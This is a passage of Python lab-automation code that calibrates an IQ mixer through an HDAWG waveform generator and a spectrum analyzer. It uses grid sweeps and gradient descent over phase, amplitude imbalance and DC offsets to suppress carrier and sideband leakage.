            dc_max_i2 = self.dc_max_i
            dc_min_i2 = self.dc_min_i
            dc_max_q2 = self.dc_max_q
            dc_min_q2 = self.dc_min_q

            while (self.opt_carrier_pow > self.max_carrier_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations:
                carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power)

                # Retrieve optimal DC offsets
                self.dc_offset_i_opt = voltages_i[np.where(carrier_power == np.amin(carrier_power))[0][0]]
                self.dc_offset_q_opt = voltages_q[np.where(carrier_power == np.amin(carrier_power))[1][0]]
                self.opt_carrier_pow = np.amin(carrier_power)

                i_cushion = np.abs(dc_max_i2 - dc_min_i2) / self.cushion_param
                q_cushion = np.abs(dc_max_q2 - dc_min_q2) / self.cushion_param

                # Reset sweep window to zoom in on minimum
                dc_max_i2 = self.dc_offset_i_opt + i_cushion
                dc_min_i2 = self.dc_offset_i_opt - i_cushion
                dc_max_q2 = self.dc_offset_q_opt + q_cushion
                dc_min_q2 = self.dc_offset_q_opt - q_cushion

                # Reinstantiate variables
                voltages_i = np.linspace(dc_min_i2, dc_max_i2, self.num_points)
                voltages_q = np.linspace(dc_min_q2, dc_max_q2, self.num_points)

                num_iterations = num_iterations + 1

            # Set optimal offsets
            self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), self.dc_offset_i_opt)
            self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), self.dc_offset_q_opt)
            time.sleep(1)
        else:
            print('Skipped Carrier')
            self.dc_offset_i_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1))
            self.dc_offset_q_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1))

        if num_iterations < self.max_iterations:
            self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
        else:
            self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')

        time.sleep(1)
        self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()))

        if self.plot_traces and not skipped:
            # Heatmap plot
            dc_sweep_data = pd.DataFrame(carrier_power,
                                         columns=np.round(voltages_q / 1e-3, 1),
                                         index=np.round(voltages_i / 1e-3, 1))
            fig, ax = plt.subplots(figsize=(8, 5))
            ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5,
                             cbar_kws={'label': 'carrier power [dBm]'})
            ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]')
            # Frequency plot
            self.sa.plot_trace()

    def opt(self):
        self.opt_lower_sideband()
        self.opt_carrier()
        time.sleep(1)
        self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(.5 * (self.amp_q_opt + self.amp_i_opt)) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
        self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
        self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')

    def _sweep_phase_amp_imbalance(self):
        for i, j in it.product(range(self.num_points), repeat=2):
            phase = self.phases[i]
            q = self.qs[j]

            # Calculate i and q amplitudes from q and a0
            amp_i = 2 * q / (1 + q) * self.a0
            amp_q = 2 * self.a0 / (1 + q)

            # Set i and q amplitudes
            self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i)
            self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q)

            # Set phaseshift
            self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase)

            # See _sweep_dc_offsets for an explanation: the delays allow the
            # spectrum analyzer reading to update before we sample it
            if i == 0 and j == 0:
                time.sleep(1)
            if j == 0:
                time.sleep(0.1)
            else:
                time.sleep(self._AWG_DELAY_TIME)

            # Read lower sideband power
            self.lower_sideband_power[i, j] = self._average_marker_power(self.lower_sb_marker)

    def _average_marker_power(self, marker):
        total_sum = 0
        for i in range(self._averages):
            total_sum = total_sum + marker.get_power()
        return total_sum / self._averages

    def _set_optimal_vals(self):
        self.opt_phase = self.phases[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[0][0]]
        self.opt_q = self.qs[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[1][0]]
        self.opt_lower_sideband_pow = np.amin(self.lower_sideband_power)

        self.amp_i_opt = 2 * self.opt_q / (1 + self.opt_q) * self.a0
        self.amp_q_opt = 2 * self.a0 / (1 + self.opt_q)

        # Set optimal I and Q amplitudes
        self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), self.amp_i_opt)
        self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), self.amp_q_opt)

        # Set optimal phaseshift
        self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), self.opt_phase)

    def _sweep_dc_offsets(self, voltages_i, voltages_q, carrier_power):
        for i, j in it.product(range(self.num_points), repeat=2):
            # Set I DC-offset
            self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), voltages_i[i])
            # Set Q DC-offset
            self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), voltages_q[j])

            # Found a bug where the first few points in the matrix seem to be from
            # the point before, i.e. the script is running faster than the spectrum
            # analyzer can update. So we first set the offsets to the initial voltage
            # and wait a bit for the spectrum analyzer to update
            if i == 0 and j == 0:
                time.sleep(1)
            # Otherwise just a generic small delay which we have empirically found to work
            if j == 0:
                time.sleep(0.1)
            else:
                time.sleep(self._AWG_DELAY_TIME)

            # Read carrier power
            carrier_power[i, j] = self._average_marker_power(self.carrier_marker)

        return carrier_power, voltages_i, voltages_q

    def plot_dc_offsets_sweep(self, dc_min_i, dc_max_i, dc_min_q, dc_max_q, num_points):
        voltages_i = np.linspace(dc_min_i, dc_max_i, num_points)
        voltages_q = np.linspace(dc_min_q, dc_max_q, num_points)
        carrier_power = np.zeros((num_points, num_points))

        dc_max_i2 = self.dc_max_i
        dc_min_i2 = self.dc_min_i
        dc_max_q2 = self.dc_max_q
        dc_min_q2 = self.dc_min_q

        carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power)

        dc_sweep_data = pd.DataFrame(carrier_power,
                                     columns=np.round(voltages_q / 1e-3, 1),
                                     index=np.round(voltages_i / 1e-3, 1))
        fig, ax = plt.subplots(figsize=(8, 5))
        ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5,
                         cbar_kws={'label': 'carrier power [dBm]'})
        ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]')

    def plot_phase_amp_sweep(self, phase_min, phase_max, q_min, q_max, num_points):
        self.phases = np.linspace(phase_min, phase_max, num_points)
        self.qs = np.linspace(q_min, q_max, num_points)
        self.lower_sideband_power = np.zeros((num_points, num_points))

        self._sweep_phase_amp_imbalance()

        lower_sideband_data = pd.DataFrame(self.lower_sideband_power,
                                           index=np.round(self.phases, 1),
                                           columns=np.round(self.qs, 2))
        fig1, ax1 = plt.subplots(figsize=(8, 5))
        ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5,
                          cbar_kws={'label': 'lower sideband power [dBm]'})
        ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance')


class IQOptimizer_GD(Optimizer):

    def __init__(
            self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20,
            min_power=-65, param_guess=([70, 0.975, 0.65, 0.05, -0.02]),
            phase_step=5, q_step=0.05, vi_step=0.005, vq_step=0.005,
            plot_traces=True, awg_delay_time=0.1, averages=10,
            HDAWG_ports=[3, 4], oscillator=2):
        """Instantiate IQ optimizer

        :param mw_source: instance of microwave source client
        :param hd: instance of AWG client
        :param sa: instance of spectrum analyzer client
        :param carrier: desired carrier frequency (in Hz)
        :param signal_freq: desired signal frequency (in Hz)
        :kwarg plot_traces: user decides if displaying power vs. iteration plots is desired
        :kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
        :kwarg min_power: noise floor
        :kwarg param_guess: starting parameters for optimization:
            ([phase shift, q := (amp_i/amp_q) amplitude imbalance,
              a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q])
        :kwarg phase_step: step size for phase parameter in gradient descent
        :kwarg q_step: step size for amplitude imbalance parameter in gradient descent
        :kwarg vi_step: step size for dc I offset parameter in gradient descent
        :kwarg vq_step: step size for dc Q offset parameter in gradient descent
        :kwarg awg_delay_time: time to wait after setting awg parameters
        :kwarg averages: number of measurements for a single point power measurement
        :kwarg HDAWG_ports: which wave ports to use on the HDAWG
        :kwarg oscillator: which oscillator to use on the HDAWG
        """

        # Configure hd settings

        # Assign oscillator 1 to sine output 2
        # hd.seti('sines/1/oscselect', 1)

        # Set carrier frequency
        hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq)

        # Set I and Q amplitude, calculated from q and a0 in the param_guess array
        hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)),
                2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1])))
        hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)),
                2 * param_guess[2] * (1 / (1 + param_guess[1])))

        # Set phase offset between I and Q
        hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0])

        # Enable sine waves
        hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1)
        hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1)

        # Set DC offsets
        hd.setd('sigouts/{}/offset'.format(HDAWG_ports[0] - 1), param_guess[3])
        hd.setd('sigouts/{}/offset'.format(HDAWG_ports[1] - 1), param_guess[4])

        self.mw_source = mw_source
        self.hd = hd
        self.sa = sa
        self.carrier = carrier
        self.signal_freq = signal_freq
        self.max_iterations = max_iterations
        self.plot_traces = plot_traces
        self.min_power = min_power
        self.HDAWG_ports = HDAWG_ports

        # Set mw freq
        self.mw_source.output_on()
        self.mw_source.set_freq(self.carrier)

        # Instantiate step sizes
        self.phase_step = phase_step
        self.q_step = q_step
        self.vi_step = vi_step
        self.vq_step = vq_step

        # Instantiate initial guesses
        self.phase_guess = param_guess[0]
        self.q_guess = param_guess[1]
        self.a0 = param_guess[2]
        self.dc_i_guess = param_guess[3]
        self.dc_q_guess = param_guess[4]

        # Instantiate params we will optimize
        self.opt_phase = None
        self.opt_q = None
        self.amp_q_opt = None
        self.amp_i_opt = None
        self.dc_offset_i_opt = None
        self.dc_offset_q_opt = None

        # Instantiate arrays and bounds
        self.opt_lower_sideband_pow = float("inf")
        self.opt_carrier_pow = float("inf")

        # Instantiate and set markers
        self.upp_sb_marker = None
        self.lower_sb_marker = None
        self.carrier_marker = None

        self.set_markers()

        self._AWG_DELAY_TIME = awg_delay_time
        self._averages = averages

    def set_markers(self):
        # Configure hd to enable outputs
        # self.hd.enable_output(0)
        # self.hd.enable_output(1)

        # Center frequency at carrier frequency
        self.sa.set_center_frequency(self.carrier + self.signal_freq)
        self.sa.set_frequency_span(6 * self.signal_freq)

        # Markers for upper sideband, lower sideband and carrier
        self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
        self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
        self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)

        # define target frequencies
        markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
        target_freqs = np.array([self.carrier + self.signal_freq,
                                 self.carrier - self.signal_freq,
                                 self.carrier])
        max_deviation = 1e6

        for marker, target_freq in zip(markers, target_freqs):
            time.sleep(1)
            marker.set_freq(target_freq)
            # assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequency: {marker_freq / 1e9} GHz"
            self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.")

        # Set reference level to just above the height of our signal to minimize our noise floor
        self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)

        if self.plot_traces:
            self.sa.plot_trace()

    def opt_lower_sideband(self):
        # gradient descent starting point
        phase = self.phase_guess
        q = self.q_guess
        self.set_phase_and_amp(phase, q)
        curr_power = self._average_marker_power(self.lower_sb_marker)

        # store power values for every iteration
        power_vec = [curr_power]

        # initialize step sizes and iteration number
        phase_step = self.phase_step
        q_step = self.q_step
        num_iterations = 0

        while num_iterations < self.max_iterations and curr_power > self.min_power:
            grad = self.calc_slope_phase_and_amp(phase, q, phase_step, q_step)
            phase_new = phase - grad[0] * phase_step
            q_new = q - grad[1] * q_step
            self.set_phase_and_amp(phase_new, q_new)
            new_power = self._average_marker_power(self.lower_sb_marker)
            if new_power < curr_power:
                curr_power = new_power
                phase = phase_new
                q = q_new
            else:
                phase_step = phase_step / 2
                q_step = q_step / 2
            power_vec.append(curr_power)
            num_iterations = num_iterations + 1

        if num_iterations < self.max_iterations:
            self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
        else:
            self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')

        time.sleep(1)
        self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')

        self.opt_phase = phase
        self.opt_q = q
        self.set_phase_and_amp(self.opt_phase, self.opt_q)
        self.lower_sideband_power = self.lower_sb_marker.get_power()

        if self.plot_traces:
            plt.plot(power_vec, label='lower band')

    def opt_carrier(self):
        # gradient descent starting point
        vi = self.dc_i_guess
        vq = self.dc_q_guess
        self.set_dc_offsets(vi, vq)
        curr_power = self._average_marker_power(self.carrier_marker)

        # store power values for every iteration
        power_vec = [curr_power]

        # initialize step sizes and iteration number
        vi_step = self.vi_step
        vq_step = self.vq_step
        num_iterations = 0

        while num_iterations < self.max_iterations and curr_power > self.min_power:
            grad = self.calc_slope_dc_offsets(vi, vq, vi_step, vq_step)
            vi_new = vi - grad[0] * vi_step
            vq_new = vq - grad[1] * vq_step
            self.set_dc_offsets(vi_new, vq_new)
            new_power = self._average_marker_power(self.carrier_marker)
            if new_power < curr_power:
                curr_power = new_power
                vi = vi_new
                vq = vq_new
            else:
                vi_step = vi_step / 1.2
                vq_step = vq_step / 1.2
            power_vec.append(curr_power)
            num_iterations = num_iterations + 1

        if num_iterations < self.max_iterations:
            self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
        else:
            self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')

        time.sleep(1)
        self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')

        self.dc_offset_i_opt = vi
        self.dc_offset_q_opt = vq
        self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt)
        self.carrier_power = self.carrier_marker.get_power()

        if self.plot_traces:
            plt.plot(power_vec, label='carrier band')
            plt.xlabel('iteration #')
            plt.ylabel('power [dBm]')
            plt.legend()

    def opt(self):
        self.opt_lower_sideband()
        while self.lower_sideband_power > self.min_power + 7.5:
            self.opt_lower_sideband()
        self.opt_carrier()
        while self.carrier_power > self.min_power + 7.5:
            self.dc_i_guess = self.dc_offset_i_opt
            self.dc_q_guess = self.dc_offset_q_opt
            self.opt_carrier()

        # for i in range(10):
        #     if self.carrier_power - 3.5 > self.lower_sideband_power:
        #         self.dc_i_guess = self.dc_offset_i_opt
        #         self.dc_q_guess = self.dc_offset_q_opt
        #         self.opt_carrier()

        time.sleep(1)
        self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
        self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
        self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')

    def set_phase_and_amp(self, phase, q):
        amp_i = 2 * q / (1 + q) * self.a0
        amp_q = 2 * self.a0 / (1 + q)

        # Set i and q amplitudes
        self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i)
        self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q)

        # Set phaseshift
        self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase)

    def set_dc_offsets(self, v1, v2):
        # Set I DC-offset
        self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1)
        # Set Q DC-offset
        self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2)

    def _average_marker_power(self, marker):
        total_sum = 0
        for i in range(self._averages):
            total_sum = total_sum + marker.get_power()
        return total_sum / self._averages

    def calc_slope_phase_and_amp(self, phase, q, phase_step, q_step):
        # central finite difference of the lower sideband power
        self.set_phase_and_amp(phase + phase_step, q)
        time.sleep(self._AWG_DELAY_TIME)
        phase_p = self._average_marker_power(self.lower_sb_marker)
        self.set_phase_and_amp(phase - phase_step, q)
        time.sleep(self._AWG_DELAY_TIME)
        phase_m = self._average_marker_power(self.lower_sb_marker)
        self.set_phase_and_amp(phase, q + q_step)
        time.sleep(self._AWG_DELAY_TIME)
        q_p = self._average_marker_power(self.lower_sb_marker)
        self.set_phase_and_amp(phase, q - q_step)
        time.sleep(self._AWG_DELAY_TIME)
        q_m = self._average_marker_power(self.lower_sb_marker)
        return [(phase_p - phase_m) / 2, (q_p - q_m) / 2]

    def calc_slope_dc_offsets(self, vi, vq, vi_step, vq_step):
        # central finite difference of the carrier power
        self.set_dc_offsets(vi + vi_step, vq)
        time.sleep(self._AWG_DELAY_TIME)
        vi_p = self._average_marker_power(self.carrier_marker)
        self.set_dc_offsets(vi - vi_step, vq)
        time.sleep(self._AWG_DELAY_TIME)
        vi_m = self._average_marker_power(self.carrier_marker)
        self.set_dc_offsets(vi, vq + vq_step)
        time.sleep(self._AWG_DELAY_TIME)
        vq_p = self._average_marker_power(self.carrier_marker)
        self.set_dc_offsets(vi, vq - vq_step)
        time.sleep(self._AWG_DELAY_TIME)
        vq_m = self._average_marker_power(self.carrier_marker)
        return [(vi_p - vi_m) / 2, (vq_p - vq_m) / 2]


class IQOptimizer_GD_multifreq(Optimizer):

    def __init__(
            self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20,
            min_power=-65, param_guess=([85, 85, 0.9, 0.9, 0.05, -0.02]),
            phase_step=5, q_step=0.1, vi_step=0.005, vq_step=0.005,
            plot_traces=True, awg_delay_time=0.1, averages=5,
            HDAWG_ports=[3, 4], oscillator=[1, 2]):
        """Instantiate IQ optimizer

        :param mw_source: instance of microwave source client
        :param hd: instance of AWG client
        :param sa: instance of spectrum analyzer client
        :param carrier: desired carrier frequency (in Hz)
        :param signal_freq: desired signal frequencies
        :kwarg plot_traces: user decides if displaying power vs. iteration plots is desired
        :kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
        :kwarg min_power: noise floor
        :kwarg param_guess: starting parameters for optimization:
            ([phase shift 1, phase shift 2,
              q := (amp_i/amp_q) amplitude imbalance 1, amplitude imbalance 2,
              dc_offset_i, dc_offset_q])
        :kwarg phase_step: step size for phase parameter in gradient descent
        :kwarg q_step: step size for amplitude imbalance parameter in gradient descent
        :kwarg vi_step: step size for dc I offset parameter in gradient descent
        :kwarg vq_step: step size for dc Q offset parameter in gradient descent
        :kwarg awg_delay_time: time to wait after setting awg parameters
        :kwarg averages: number of measurements for a single point power measurement
        :kwarg HDAWG_ports: which wave ports to use on the HDAWG
        :kwarg oscillator: which oscillators to use on the HDAWG
        """

        # Set carrier frequencies
        hd.setd('oscs/{}/freq'.format(oscillator[0] - 1), signal_freq[0])
        hd.setd('oscs/{}/freq'.format(oscillator[1] - 1), signal_freq[1])

        # assign oscillators to correct outputs
        # for first output
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format(
            int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[0] - 1)
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format(
            int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[0] - 1)
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format(
            int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[1] - 1)
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format(
            int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[1] - 1)
        # for second output
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format(
            int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[0] - 1)
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format(
            int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[0] - 1)
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format(
            int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[1] - 1)
        hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format(
            int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[1] - 1)

        self.mw_source = mw_source
        self.hd = hd
        self.sa = sa
        self.carrier = carrier
        self.signal_freq = signal_freq
        self.max_iterations = max_iterations
        self.plot_traces = plot_traces
        self.min_power = min_power
        self.HDAWG_ports = HDAWG_ports

        # Set mw freq
        self.mw_source.output_on()
        self.mw_source.set_freq(self.carrier)

        # Instantiate step sizes
        self.phase_step = phase_step
        self.q_step = q_step
        self.vi_step = vi_step
        self.vq_step = vq_step

        # Instantiate initial guesses
        self.phase_guess = [param_guess[0], param_guess[1]]
        self.q_guess = [param_guess[2], param_guess[3]]
        self.dc_i_guess = param_guess[4]
        self.dc_q_guess = param_guess[5]

        # Instantiate params we will optimize
        self.opt_phase = np.zeros(2)
        self.opt_q = np.zeros(2)
        self.amp_q_opt = None
        self.amp_i_opt = None
        self.dc_offset_i_opt = None
        self.dc_offset_q_opt = None

        # Instantiate arrays and bounds
        self.opt_lower_sideband_pow = float("inf")
        self.opt_carrier_pow = float("inf")

        # Instantiate and set markers
        self.upp_sb_marker = None
        self.lower_sb_marker = None
        self.carrier_marker = None

        # set initial guess parameters
        self.set_phase_and_amp(self.phase_guess[0], self.q_guess[0], 0)
        self.set_phase_and_amp(self.phase_guess[1], self.q_guess[1], 1)
        self.set_dc_offsets(self.dc_i_guess, self.dc_q_guess)

        # Enable signal
        self.hd.seti('awgs/{}/enable'.format(int(np.floor((HDAWG_ports[1] - 1) / 2))), 1)

        self.set_markers(1)

        self._AWG_DELAY_TIME = awg_delay_time
        self._averages = averages

    def set_markers(self, signal):
        # signal: 0 or 1, refers to the first or second frequency

        # Center frequency at carrier frequency
        self.sa.set_center_frequency(self.carrier + self.signal_freq[signal])
        self.sa.set_frequency_span(6 * self.signal_freq[signal])

        # Markers for upper sideband, lower sideband and carrier
        self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
        self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
        self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)

        # define target frequencies
        markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
        target_freqs = np.array([self.carrier + self.signal_freq[signal],
                                 self.carrier - self.signal_freq[signal],
                                 self.carrier])
        max_deviation = 1e6

        for marker, target_freq in zip(markers, target_freqs):
            time.sleep(1)
            marker.set_freq(target_freq)
            # assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequency: {marker_freq / 1e9} GHz"
            self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.")

        # Set reference level to just above the height of our signal to minimize our noise floor
        self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)

        if self.plot_traces:
            self.sa.plot_trace()

    def opt_lower_sideband(self, signal):
        # set the markers for the sideband we are currently looking at
        if self.plot_traces:
            self.plot_traces = False
            self.set_markers(signal)
            self.plot_traces = True
        else:
            self.set_markers(signal)

        # gradient descent starting point
        phase = self.phase_guess[signal]
        q = self.q_guess[signal]
        self.set_phase_and_amp(phase, q, signal)
        curr_power = self._average_marker_power(self.lower_sb_marker)

        # store power values for every iteration
        power_vec = [curr_power]

        # initialize step sizes and iteration number
        num_iterations = 0
        phase_step = self.phase_step
        q_step = self.q_step

        while num_iterations < self.max_iterations and curr_power > self.min_power:
            grad = self.calc_slope_phase_and_amp(phase, q, signal, phase_step, q_step)
            phase_new = phase - grad[0] * phase_step
            q_new = q - grad[1] * q_step
            self.set_phase_and_amp(phase_new, q_new, signal)
            new_power = self._average_marker_power(self.lower_sb_marker)
            if new_power < curr_power:
                curr_power = new_power
                phase = phase_new
                q = q_new
            else:
                phase_step = phase_step / 2
                q_step = q_step / 2
            power_vec.append(curr_power)
            num_iterations = num_iterations + 1

        if num_iterations < self.max_iterations:
            self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
        else:
            self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')

        time.sleep(1)
        self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')

        self.opt_phase[signal] = phase
        self.opt_q[signal] = q
        self.set_phase_and_amp(self.opt_phase[signal], self.opt_q[signal], signal)

        if self.plot_traces:
            plt.plot(power_vec, label='lower sideband for frequency {}'.format(signal))

    def opt_carrier(self):
        # gradient descent starting point
        vi = self.dc_i_guess
        vq = self.dc_q_guess
        self.set_dc_offsets(vi, vq)
        curr_power = self._average_marker_power(self.carrier_marker)

        # store power values for every iteration
        power_vec = [curr_power]

        num_iterations = 0

        while num_iterations < self.max_iterations and curr_power > self.min_power:
            grad = self.calc_slope_dc_offsets(vi, vq)
            vi_new = vi - grad[0] * self.vi_step
            vq_new = vq - grad[1] * self.vq_step
            self.set_dc_offsets(vi_new, vq_new)
            new_power = self._average_marker_power(self.carrier_marker)
            if new_power < curr_power:
                curr_power = new_power
                vi = vi_new
                vq = vq_new
            else:
                self.vi_step = self.vi_step / 1.2
                self.vq_step = self.vq_step / 1.2
            power_vec.append(curr_power)
            num_iterations = num_iterations + 1

        if num_iterations < self.max_iterations:
            self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
        else:
            self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')

        time.sleep(1)
        self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')

        self.dc_offset_i_opt = vi
        self.dc_offset_q_opt = vq
        self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt)

        if self.plot_traces:
            plt.plot(power_vec, label='carrier band')
            plt.xlabel('iteration #')
            plt.ylabel('power [dBm]')
            plt.legend()

    def opt(self):
        self.opt_lower_sideband(0)
        self.hd.log.info('Lower sideband power for 1st frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
        self.opt_lower_sideband(1)
        self.hd.log.info('Lower sideband power for second frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
        self.opt_carrier()
        time.sleep(1)

        # self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
        self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
        self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')

    def set_phase_and_amp(self, phase, q, signal):
        amp_i = 2. * q / (1 + q)
        amp_q = 2. * 1 / (1 + q)
        dphase_i = np.arccos(amp_i / 2) * 180 / np.pi
        dphase_q = np.arccos(amp_q / 2) * 180 / np.pi

        # Set i and q amplitudes via phase offsets of the paired carriers
        self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
            int(np.floor((self.HDAWG_ports[0] - 1) / 2)), np.mod(self.HDAWG_ports[0] - 1, 2), 2 * signal),
            phase + dphase_i)
        self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
            int(np.floor((self.HDAWG_ports[0] - 1) / 2)), np.mod(self.HDAWG_ports[0] - 1, 2), 2 * signal + 1),
            phase - dphase_i)
        self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
            int(np.floor((self.HDAWG_ports[1] - 1) / 2)), np.mod(self.HDAWG_ports[1] - 1, 2), 2 * signal),
            dphase_q)
        self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
